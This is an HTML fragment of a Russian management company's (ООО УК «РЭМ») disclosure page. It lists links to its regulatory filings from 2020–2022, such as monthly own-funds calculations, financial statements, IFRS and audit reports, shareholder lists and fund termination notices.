<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/Для%20сайта%2005-2022.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Расчет размера собственных средств на 31.05.2022, раскрыт 10.06.2022</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/НСО_УК_0420514_1_Разделы_(4.2)_30.04.2022.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 30.04.2022, раскрыт 17.05.2022</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/2022.05.12_Положение_отказ%20клиенту.pdf" target="_blank"><span color="#0000ff" face="andale mono, times" style="color: #0000ff;">Положение о порядке отказа клиенту в выполнении его распоряжения о совершении операции&nbsp;</span><span style="color: #0000ff;">и организации работы с представленными клиентом документами и (или) сведениями об отсутствии&nbsp;</span><span style="color: #0000ff;">оснований для принятия решения об отказе в выполнении распоряжения клиента о совершении&nbsp;</span><span style="color: #0000ff;">операции ООО УК «РЭМ»</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; color: #000000; font-size: 12pt;"><span color="#0000ff" face="andale mono, times">Раскрыт 12.05.2022</span></span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Сообщение%20об%20изменении%20телефона.pdf" target="_blank">Сообщение об изменении номера телефона/факса. раскрыт 28.04.2022</a>&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РЭМ%20АЗ%20МСФО%202021.PDF" target="_blank"><span style="color: #0000ff;">Финансовая отчетность, подготовленная в соответствии с международными стандартами финансовой отчетности (МСФО) за год, закончившийся 31.12.2021 г. раскрыт 28.04.2022&nbsp;&nbsp;</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/БФО%201-2022%20для%20публикации%20пдп.pdf" target="_blank"><span style="color: #0000ff;">Бухгалтерский баланс, отчет о финансовых результатах, отчет о потоках денежных средств и отчет об изменениях собственного капитала ООО УК "РЭМ" на 31.03.2022</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #000000; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Дата опубликования информации - 25.04.2022</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20для%20публикации%2003-2022.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.03.2022, раскрыт 13.04.2022&nbsp;</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/АЗ%20РЭМ%202021___БФО%202021г%20с%20Примечаниями.PDF" target="_blank"><span style="color: #0000ff;">Аудиторское заключение, Бухгалтерский баланс и Отчет о финансовых результатах на 31.12.2021, раскрыт 15.03.2022</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Список_04.docx" target="_blank"><span style="color: #0000ff;">Список акционеров (участников) ООО УК «РЭМ» и лиц, под контролем либо значительным влиянием которых находится ООО УК «РЭМ» от 15.03.2022 г. (дата раскрытия информации – 15.03.2022 г., информация доступна до внесения изменений)</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Список_04.docx" target="_blank"><span style="color: #0000ff;">&nbsp;</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Схема_04.docx" target="_blank"><span style="color: #0000ff;">Схема взаимосвязей акционеров (участников) ООО УК «РЭМ» и лиц, под контролем либо значительным влиянием которых находится ООО УК «РЭМ» от 15.03.2022 г. (дата раскрытия информации – 15.03.2022, информация доступна до внесения изменений)</span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/НСО_УК_0420514_1_Разделы_(4.2).pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 28.02.2022, раскрыт 14.03.2022</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20для%20сайта%2001-2022.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.01.2022, раскрыт 14.02.2022</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20на%20сайт%2031-2021.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.12.2021, раскрыт 21.01.2022</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20для%20сайта%2011-2021.pdf" target="_blank">Расчет размера собственных средств на 30.11.2021, раскрыт 14.12.2021</a>&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%2010-2021.pdf" target="_blank"><span color="#0000ff" style="color: #0000ff;">Расчет размера собственных средств на 31.10.2021, раскрыт 16.11.2021&nbsp;</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/БФО%203-2021%20для%20сайта%20без%20подписи.pdf" target="_blank"><span color="#0000ff" style="color: #0000ff;">Бухгалтерский баланс, отчет о финансовых результатах, отчет о потоках денежных средств и отчет об изменениях собственного капитала ООО УК "РЭМ" на 30.09.2021</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span style="color: #000000;">Дата опубликования информации - 28.10.2021</span></span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%2009-2021.pdf" target="_blank"><span color="#0000ff" style="color: #0000ff;">Расчет размера собственных средств на 30.09.2021, раскрыт 14.10.2021</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/003_1_Регламент%20промежуточный__на%2001.10.21.docx" target="_blank"><span style="color: #000000;"><span color="#0000ff" style="color: #0000ff;">Регламент признания лиц квалифицированными инвесторами ООО УК «РЭМ» (новая редакция от 01.10.2021)</span></span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span style="color: #000000;">Дата и время размещения информации: 01.10.2021.&nbsp;</span>Информация доступна до внесения изменений</span></p>
<p><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/003_2_Способ%20направления__Квалам.docx" target="_blank"><span style="color: #0000ff;">Способ направления уведомления о последствиях признания квалифицированным инвестором</span> </a> </span></p>
<p style="text-align: justify;"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;">Дата и время размещения информации: 01.10.2021. Информация доступна до внесения изменений</span></p>
<p style="text-align: justify;"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span style="color: #0000ff;"><a href="/documents/003_3_Способ%20направления__после%20теста.docx" target="_blank"><span style="color: #0000ff;">Способы предоставления Уведомления об оценке результатов тестирования физического лица, не являющегося Квалифицированным инвестором.</span> </a> </span>&nbsp;</span></p>
<p style="text-align: justify;"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;">Опубликован 01.10.2021</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Обновленная%20РСС%2008-2021%20для%20публикации.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.08.2021, раскрыт 14.09.2021 в 17:00 мск, раскрыт до 31.08.22</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20на%20сайт%20(07-21).pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.07.2021, раскрыт 13.08.2021 в 16:00 мск, раскрыт до 31.08.22</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/БФО%202-2021%20на%20сайт.pdf" target="_blank"><span style="color: #0000ff;">Бухгалтерский баланс, отчет о финансовых результатах, отчет о потоках денежных средств и отчет об изменениях собственного капитала ООО УК "РЭМ" на 30.06.2021 (дата опубликования информации - 28.07.2021, Время опубликования информации - 17:30. Дата, до которой осуществляется доступ к информации - 01.08.2022)</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20публикация%2006-2021.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 30.06.2021, раскрыт 14.07.2021 в 16:00 мск, раскрыт до 31.07.22</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%2005-21%20для%20публикации.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.05.2021, раскрыт 15.06.2021 в 17:00 мск, раскрыт до 30.06.22</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p class="MsoPlainText"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20Апрель%202021.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 30.04.2021, раскрыт 24.05.2021 в 15:00 мск, раскрыт до 31.05.22</span> </a> </span> <o:p></o:p></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span style="color: #0000ff;"></span><a href="/documents/2021.04.12_Положение_отказ%20клиенту.pdf" target="_blank"><span style="color: #0000ff;">Положение о порядке отказа клиенту в выполнении его распоряжения о совершении операции и организации работы с представленными клиентом документами и (или) сведениями об отсутствии оснований для принятия решения об отказе в выполнении распоряжения клиента о совершении операции ООО УК «РЭМ» (дата опубликования информации - 29.04.2021, время опубликования информации - 17:00. Дата, до которой осуществляется доступ к информации - бессрочно)</span></a> </span></p>
<p style="text-align: justify;"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/БФО%20публикация%201-2021%20Подписанный.pdf" target="_blank"><span style="color: #0000ff;"><span color="#0000ff" style="color: #0000ff;">Бухгалтерский баланс, отчет о финансовых результатах, отчет о потоках денежных средств и отчет об изменениях собственного капитала ООО УК "РЭМ" на 31.03.2021 (дата опубликования информации - 14.04.2021, Время опубликования информации - 14:30. Дата, до которой осуществляется доступ к информации - 01.05.2022)&nbsp;</span></span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span color="#0000ff" style="color: #0000ff;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/001__АЗ%20РЭМ%20МСФО%202020.pdf" target="_blank"><span style="color: #0000ff;">Финансовая отчетность, подготовленная в соответствии с международными стандартами финансовой отчетности (МСФО) за год, закончившийся 31.12.2020 г. раскрыт 15.04.2021 в 17:00 мск, раскрыт до 30.04.2022</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p class="MsoPlainText" style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20публикация%2003-2021.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.03.2021, раскрыт 14.04.2021 в 15:00 мск, раскрыт до 30.04.2022</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p class="MsoPlainText" style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/АЗ%20и%20БФО%204%20%20формы%20с%20подписью%20печатью%20.PDF" target="_blank"><span style="color: #0000ff;">Аудиторское заключение, Бухгалтерский баланс и Отчет о финансовых результатах на 31.12.2020, раскрыт 24.03.2021 16:45 мск, доступ предоставляется до 31.03.2022</span> </a> <o:p></o:p> </span></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p class="MsoPlainText" style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/рсс%20февраль%202021%20для%20сайта.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 28.02.2021, раскрыт 15.03.2021 в 15:00 мск, раскрыт до 31.03.2022</span> </a> </span> <o:p></o:p></p>
<p style="text-align: justify;" align="justify"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p class="MsoPlainText" style="text-align: justify;"><span style="font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/ф.514%20для%20публикации%20НА%20САЙТ.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.01.2021, раскрыт 12.02.2021 в 14:00 мск, раскрыт до 28.02.2022</span> </a> </span> <o:p></o:p></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/002__Сообщение%20о%20прекращении.pdf" target="_blank" style="font-family: Helvetica, sans-serif; font-size: 10pt;"><span style="color: #0000ff;">Сообщение о прекращении Комбинированного закрытого паевого инвестиционного фонда «Инвестиции и строительство» под управлением Общества с ограниченной ответственностью Управляющая компания «Резерв Эссет Менеджмент», раскрыт 12.02.2020 в 11:20 мск, раскрыт до даты исключения паевого инвестиционного фонда из реестра паевых инвестиционных фондов</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p class="MsoPlainText" style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/для%20публикации%20РРСС%20за%20Декабрь%202020%20г..pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.12.2020, раскрыт 21.01.2021 в 16:00 мск, раскрыт до 31.01.2022</span> </a> </span> <o:p></o:p></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Сообщение%20о%20регистрации%20ИПДУ%20№%2012.pdf" target="_blank"><span style="color: #0000ff;">Сообщение о регистрации ИПДУ № 12 (дата опубликования информации - 18.12.2020, Время опубликования информации – 11:17.&nbsp;Дата, до которой осуществляется доступ к информации - 18.01.2021)</span> </a><span style="text-align: justify;"><br></span></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/для%20публикации_0420514_.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 30.11.2020, раскрыт 14.12.2020 в 14:00 мск, раскрыт до 31.12.2021</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/НСО_УК_0420514_.pdf" target="_blank" style="font-family: Helvetica, sans-serif; font-size: 10pt;"><span style="color: #0000ff;">Расчет размера собственных средств на 31.10.2020, раскрыт 16.11.2020 в 14:00 мск, раскрыт до 30.11.2021</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/для%20публикации%20БФО%20за%209%20месяцев%202020%20г..pdf" target="_blank"><span style="color: #0000ff;"><span style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial;">Бухгалтерский баланс, отчет о финансовых результатах, отчет о потоках денежных средств и отчет об изменениях собственного капитала ООО УК "РЭМ" на 30.09.2020 (дата опубликования информации - 28.10.2020, Время опубликования информации - 15:30. Дата, до которой осуществляется доступ к информации - 31.</span><span style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial;" lang="EN-US">10</span><span style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial;">.202</span><span style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial;" lang="EN-US">1</span><span style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial;">)</span>&nbsp;</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20для%20публикации%2009_20.pdf" target="_blank" style="font-family: Helvetica, sans-serif; font-size: 10pt;"><span style="color: #0000ff;">Расчет размера собственных средств на 30.09.2020, раскрыт 14.10.2020 в 18:00 мск, раскрыт до 31.10.2021</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/03__Сообщение%20о%20прекращении.pdf" target="_blank"><span style="color: #0000ff;"><span style="color: blue; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial;">Дополнения в </span><span style="color: blue; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial;"><span style="color: blue;">Сообщение о прекращении Комбинированного ЗПИФ «Эверест Ритейл», раскрыт 09.10.2020 в 15:00 мск, раскрыт до даты исключения паевого инвестиционного фонда из реестра паевых инвестиционных фондов</span></span> </span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20для%20публикации%2008_20.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.08.2020, раскрыт 14.09.2020 в 16:00 мск, раскрыт до 30.09.2021</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/002__Сообщение%20о%20прекращении%20эверест%20ретейл.pdf" target="_blank"><span style="color: #0000ff;">Сообщение о прекращении Комбинированного ЗПИФ «Эверест Ритейл», раскрыт 19.08.2020 в 15:00 мск, раскрыт до даты исключения паевого инвестиционного фонда из реестра паевых инвестиционных фондов</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%20%20для%20публикации%20за%20Июль%202020%20г_.pdf" target="_blank"><span style="background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; color: #0000ff;">Расчет размера собственных средств на 31.07.2020, раскрыт 14.08.2020 в 18:00 мск, раскрыт до 31.08.2021</span> </a> </span> <o:p></o:p></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Для%20публикации%202%20кв.%20БФО%202020.pdf" target="_blank"><span style="color: #0000ff;">Бухгалтерский баланс, отчет о финансовых результатах, отчет о потоках денежных средств и отчет об изменениях собственного капитала ООО УК "РЭМ" на 30.06.2020 (дата опубликования информации - 30.07.2020, Время опубликования информации - 14:30. Дата, до которой осуществляется доступ к информации - 31.07.2022)</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Для%20публикации%20Июль%202020.pdf" target="_blank"><span style="color: #0000ff;"><span style="color: #0000ff;"><span color="#0000ff" style="color: #0000ff;">Расчет размера собственных средств на 30.06.2020, раскрыт 15.07.2020 в 18:00 мск, раскрыт до 31.07.2021</span></span> </span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Для%20публикации%20Май%202020%20УК%20РЭМ.pdf" target="_blank"><span style="color: #0000ff;">Расчет размера собственных средств на 31.05.2020, раскрыт 15.06.2020 в 17:00 мск, раскрыт до 30.06.2021</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/Для%20публикации%20Апрель%202020.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff;">Расчет размера собственных средств на 30.04.2020, раскрыт 20.05.2020 в 17:00 мск, раскрыт до 31.05.2021</span> </a> </span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/БФО_1кв_2020__Подписан.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff;">Бухгалтерский баланс, отчет о финансовых результатах, отчет о потоках денежных средств и отчет об изменениях собственного капитала ООО УК "РЭМ" на 31.03.2020 (дата опубликования информации - 30.04.2020, Время опубликования информации - 20:30. Дата, до которой осуществляется доступ к информации - 01.05.2021)</span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/000__Отчет%20РЭМ%20МСФО%202019.pdf" target="_blank"><span style="color: #0000ff; text-align: justify;"><span color="#0000ff" face="arial, helvetica, sans-serif">Финансовая отчетность, подготовленная в соответствии с международными стандартами финансовой отчетности (МСФО) за год, закончившийся 31.12.2019 г. раскрыт 28.04.2020 в 18:00 мск, раскрыт до 30.04.2021</span></span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/сообщение%20о%20работе.pdf" target="_blank"><span style="color: #0000ff; text-align: justify;"><span color="#0000ff" face="arial, helvetica, sans-serif">Сообщение о работе ООО УК «РЭМ» в период с 01.04.2020 по 30.04.2020</span></span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; text-align: justify; font-size: 12pt;"><span color="#0000ff" face="arial, helvetica, sans-serif">&nbsp;</span></span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><a href="/documents/РСС%2017.04.2020.pdf" target="_blank"><span style="color: #0000ff; text-align: justify;">Расчет размера собственных средств на 31.03.2020, раскрыт 17.04.2020 в 16:30 мск, раскрыт до 31.03.2021</span> </a> </span></p>
<p style="text-align: justify;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; text-align: justify; font-size: 12pt;">&nbsp;</span></p>
